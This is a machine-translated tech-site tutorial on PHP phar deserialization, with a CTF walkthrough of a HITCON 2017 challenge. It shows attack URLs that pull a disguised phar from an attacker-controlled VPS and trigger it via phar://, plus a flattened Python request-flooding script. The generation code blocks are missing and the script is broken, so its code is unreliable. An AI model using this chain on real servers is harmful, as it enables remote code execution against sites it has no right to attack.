Shulou(Shulou.com)05/31 Report--

This article will explain in detail what phar is in the introduction to PHP deserialization. The content of the article is of high quality, so the editor will share it with you for reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.

Phar introduction

To put it simply, phar is an php compressed document. It can archive multiple files to the same file, and can be accessed and executed by php without decompression. Similar to file:// php://, it is also a stream wrapper.

The phar structure consists of four parts.

Identification of stub phar file in xxx format

Manifest compressed file attributes and other information to serialize the storage

Contents of the contents compressed file

Signature signature, put at the end of the file

There are two key points here. One is the file identification, which must end with _ _ HALT_COMPILER ();? >, but there is no limit to the previous content, that is, we can easily forge an image file or pdf file to bypass some upload restrictions. The second is deserialization, the meta-data information stored in phar is stored in a serialized manner. When the file operation function parses the phar file through the phar:// pseudo-protocol, the data will be deserialized, and there are many such file operation functions.

The above is from the understanding of PHP deserialization vulnerabilities by PHPGGC. Next, let's learn about the use of phar deserialization through two CTF topics.

Example one

This question is relatively simple. You can generate the phar file directly, and then use the upload image feature of the website, combined with the file_exists function in line 11 to deserialize phar. The generated code is as follows:

Example two

This question is selected from Baby H Master PHP 2017 in HITCON2017. Click here to download it.

The meaning of the topic is clear, asking us to use the _ _ destruct method of the Admin class to get the flag. But we can't get the $random variable on line 20, so we can't get the flag, so we have to call the flag generation function through the name of the anonymous class.

We can look at the kernel source code corresponding to the create_function function. (php-src/Zend/zend_builtin_functions.c:1901)

You can see that the name of the anonymous function is similar to\ 0lambda_%d, where% d is a number, depending on the number of anonymous functions in the process, but every time we visit the topic, an anonymous function is generated, so the name of the anonymous function is difficult to control. Here, we will introduce the apache-prefork model (the default model) (for an introduction to this model, you can refer to: Apache's comparison of the three MPM modes: prefork,worker,event). When the user request is too large and exceeds the default threshold set by apache, a new thread will be started to process the request, and the name of the anonymous function will be incremented from 1 in the new thread, so it is easy to guess the name of the anonymous function.

Next, let's find the use point of deserialization. We soon see that line 35 deserializes a controllable $data variable, but the previous line has a hash_equals function for data verification, and the value of $SECRET is unknown, which makes it impossible to take advantage of this deserialization point. Then we will see that line 40 has a function to upload gif files, and the $data variable is controllable. So the idea of the attack is that we first deserialize by transferring the constructed phar file to the server and then using the controllable $_ GET ["url"] combined with the phar protocol. The code used to generate phar is as follows:

Put the generated avatar.phar on your own VPS and rename it to avatar.gif, and then upload the file to the topic server:

Http:// title IP/index.php?m=upload&url= http://VPS_IP/

Next, we need to restart a new thread with a large number of requests, and then access the following url to complete the deserialization and get the flag:

Http:// title IP/index.php?m=upload&url=phar:///var/www/data/xxxx/&lucky=lambda_1

For further use of phar, you can refer to this article: Phar and Stream Wrapper cause deep mining of PHP RCE.

Import requestsimport socketimport timefrom multiprocessing.dummy import Pool as ThreadPooltry: requests.packages.urllib3.disable_warnings () except: passdef run (I): while 1: HOST = '127.0.1' PORT = 8000 s = socket.socket (socket.AF_INET, socket.SOCK_STREAM) s.connect ((HOST) PORT)) s.sendall ('GET / avatar.gif HTTP/1.1\ nHost: localhost\ nConnection: Keep-Alive\ n\ n') # s.close () print 'ok' time.sleep (0.5) I = 8pool = ThreadPool (I) result = pool.map_async (run, range (I)). Get (0xffff) about what phar is in the introduction to PHP deserialization I hope the above content can be of some help to you and learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.